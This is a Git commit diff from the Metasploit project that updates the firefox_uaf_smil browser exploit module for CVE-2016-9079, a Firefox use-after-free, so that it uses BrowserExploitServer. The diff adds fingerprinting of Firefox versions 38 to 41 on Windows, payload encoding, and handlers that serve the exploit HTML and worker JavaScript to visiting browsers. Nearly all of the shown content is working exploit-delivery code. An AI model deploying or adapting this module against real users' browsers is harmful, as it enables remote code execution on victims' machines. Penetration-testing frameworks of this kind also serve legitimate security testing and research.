Land #7895, Update firefox_uaf_smil to use BrowserExploitServer

bug/bundler_fix
William Webb 2017-02-01 16:42:39 -06:00
commit b4a9bfc7a9
No known key found for this signature in database
GPG Key ID: 341763D0308DA650
1 changed files with 19 additions and 23 deletions

View File

@ -8,7 +8,7 @@ require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
@ -25,9 +25,17 @@ require 'msf/core'
'William Webb <william_webb[at]rapid7.com>' # Metasploit module
],
'Platform' => 'win',
'BrowserRequirements' =>
{
source: /script/i,
os_name: OperatingSystems::Match::WINDOWS,
ua_name: HttpClients::FF,
# Fixed in Firefox 50.0.2
ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }
},
'Targets' =>
[
[ 'Mozilla Firefox',
[ 'Mozilla Firefox 38 to 41',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
@ -42,9 +50,9 @@ require 'msf/core'
'References' =>
[
[ 'CVE', '2016-9079' ],
[ 'Bugzilla', '1321066' ]
[ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],
[ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]
],
'Arch' => ARCH_X86,
'DisclosureDate' => "Nov 30 2016",
'DefaultTarget' => 0
)
@ -60,7 +68,7 @@ require 'msf/core'
p = payload.encoded
arch = Rex::Arch.endian(target.arch)
payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
base_uri = "#{get_resource.chomp('/')}"
base_uri = get_module_resource
# stuff that gets adjusted alot during testing
@ -248,28 +256,16 @@ require 'msf/core'
send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
end
def is_ff_on_windows(user_agent)
target_hash = fingerprint_user_agent(user_agent)
if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
return false
end
return true
end
def on_request_uri(cli, request)
def on_request_exploit(cli, request, browser_info)
print_status("Got request: #{request.uri}")
print_status("From: #{request.headers['User-Agent']}")
if (!is_ff_on_windows(request.headers['User-Agent']))
print_error("Unsupported user agent: #{request.headers['User-Agent']}")
send_not_found(cli)
close_client(cli)
return
end
if request.uri =~ /worker\.js/
print_status("Sending worker thread Javascript ...")
worker_js(cli)
return
end
if request.uri =~ /index\.html/ or request.uri =~ /\//
print_status("Sending exploit HTML ...")